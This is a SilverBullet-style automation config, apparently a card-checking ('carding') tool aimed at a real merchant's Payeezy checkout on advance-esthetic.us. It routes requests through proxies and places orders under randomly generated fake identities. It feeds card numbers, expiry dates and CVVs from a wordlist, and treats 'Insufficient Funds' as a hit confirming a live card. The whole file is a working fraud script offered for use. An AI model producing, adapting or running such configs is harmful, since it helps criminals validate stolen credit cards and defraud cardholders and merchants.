[SETTINGS]
{
  "Name": "PAYEEZY GATEWAY",
  "SuggestedBots": 5,
  "MaxCPM": 0,
  "LastModified": "2022-06-14T01:15:57.0236513+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "JOHN",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "PAYEEZY GATEWAY",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://advance-esthetic.us/addCartItem" 
  CONTENT "action=additem&itemid=6267&" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "dnt: 1" 
  HEADER "origin: https://advance-esthetic.us" 
  HEADER "referer: https://advance-esthetic.us/zemits-aknoevit-acne-treatment-and-skin-rejuvenation-system" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"102\", \"Google Chrome\";v=\"102\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" 
  HEADER "x-requested-with: XMLHttpRequest" 

REQUEST POST "https://advance-esthetic.us/changehowtopay" 
  CONTENT "howtopay_par=payeezy_pay&rand=0.9644926182519906" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Host: advance-esthetic.us" 
  HEADER "Sec-Ch-Ua: \"-Not.A/Brand\";v=\"8\", \"Chromium\";v=\"102\"" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Origin: https://advance-esthetic.us" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://advance-esthetic.us/makeorder" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

REQUEST POST "https://advance-esthetic.us/changehowtoship" 
  CONTENT "howtoship_par=goshippo_tipdost&rand=0.33926597974727746" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Host: advance-esthetic.us" 
  HEADER "Sec-Ch-Ua: \"-Not.A/Brand\";v=\"8\", \"Chromium\";v=\"102\"" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Origin: https://advance-esthetic.us" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://advance-esthetic.us/makeorder" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

FUNCTION RandomString "?d?d?d?d?d?d?d?d" -> VAR "phone" 

FUNCTION RandomString "?l?l?l?l?l?l?l?l?d?d?d" -> VAR "ename" 

REQUEST POST "https://advance-esthetic.us/addorder" 
  CONTENT "email=<ename>@gma.com&firstname=john&lastname=far&telephone=215<phone>&address=Bond St&city=New York&postalcode=10080&country=sys_countries_usa&stateregion=_sys_general_regions_36&otheraddress=0&howtoship=goshippo_tipdost&stepOrder=1&howtopay=payeezy_pay&payeezy[number]=&payeezy[name]=&payeezy[expiry]=&payeezy[cvc]=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "dnt: 1" 
  HEADER "origin: https://advance-esthetic.us" 
  HEADER "referer: https://advance-esthetic.us/makeorder" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"102\", \"Google Chrome\";v=\"102\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" 
  HEADER "x-requested-with: XMLHttpRequest" 

FUNCTION Replace "20" "" "<ano>" -> VAR "ano1" 

REQUEST POST "https://advance-esthetic.us/addorder" 
  CONTENT "email=<ename>@gma.com&firstname=john&lastname=far&telephone=215<phone>&address=bond st&city=&postalcode=10080&country=sys_countries_usa&stateregion=_sys_general_regions_36&otheraddress=0&howtoship=goshippo_tipdost&stepOrder=3&howtopay=payeezy_pay&payeezy[number]=<cc>&payeezy[name]=JOHN FAR &payeezy[expiry]=<mes>/<ano1>&payeezy[cvc]=<cvv>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: advance-esthetic.us" 
  HEADER "Sec-Ch-Ua: \"-Not.A/Brand\";v=\"8\", \"Chromium\";v=\"102\"" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Origin: https://advance-esthetic.us" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://advance-esthetic.us/makeorder/step/payment_method" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

PARSE "<SOURCE>" LR "\"err_mess\":\"" "\"" CreateEmpty=FALSE -> CAP "Responce-1" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "Insufficient Funds" 
  KEYCHAIN Failure OR 
    KEY "The card number must be numeric" 
    KEY "Invalid CC Number" 
    KEY "Lost\\/Stolen" 
    KEY "Declined" 
    KEY "Invalid Transaction Type" 
    KEY "Account Closed" 
    KEY "Expiry Date is invalid" 
    KEY "Do Not Honor" 
    KEY "The credit card number check failed, Expiry Date is invalid" 
    KEY "The credit card number check failed" 
    KEY "Pickup" 
    KEY "Expiry Date is invalid" 
    KEY "Card is expired" 
    KEY "Restraint" 
    KEY "The card type is invalid" 
    KEY "Invalid Institution Code" 
    KEY "Other Error" 
  KEYCHAIN Retry OR 
    KEY "Bad Request (26) - Invalid Amount" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "CVV2\\/VAK Failure" 
    KEY "Suspected Fraud" 

